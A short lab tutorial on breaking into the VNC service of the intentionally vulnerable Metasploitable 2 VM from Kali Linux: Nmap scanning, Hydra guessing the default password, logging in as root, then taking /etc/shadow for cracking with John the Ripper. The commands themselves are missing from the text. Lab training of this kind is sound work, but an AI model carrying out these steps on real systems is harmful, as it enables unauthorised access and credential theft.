Attacking Metasploitable VNC Services

Attacking Metasploitable VNC Services

In this tutorial we will exploit the VNC service running on Metasploitable 2. The main use of this service is to allow admins to control other systems remotely. When you discover a running VNC service (normally on port 5900) it should be checked for weak passwords.

To demonstrate this attack we use Kali Linux (as attacker) and Metasploitable 2 (as victim) both running on VirtualBox. If you need help setting up Kali Linux then should look here

Kali Linux: 192.168.1.7
Metasploitable: 192.168.1.4

The first thing to do is to perform a fingerprint of the Metasploitable server to see what services are open. This can be done by using Nmap, open a terminal and enter the command below (note: if you are using different IPs then substitute your own in).

 

 As you can see there are a lot of open services, for this tutorial we will focus on vnc port 5900.

Exploitation

Now that we have identified that the service is running we can check if it using a weak/default passwords. To do this we will use a network logon cracker called Hydra.
The command below checks if the service is using the default password and as you can see it has returned password: password

Now that we know the password we can try and connect to it using vncviewer. We just enter "password" when prompted.

We have now connected as root on the metasploitable box. The last thing to do is extract some information such as passwords. In Linux these are stored in /etc/shadow. The last step would be to retrieve the file and run a password cracking tool such as John the Ripper.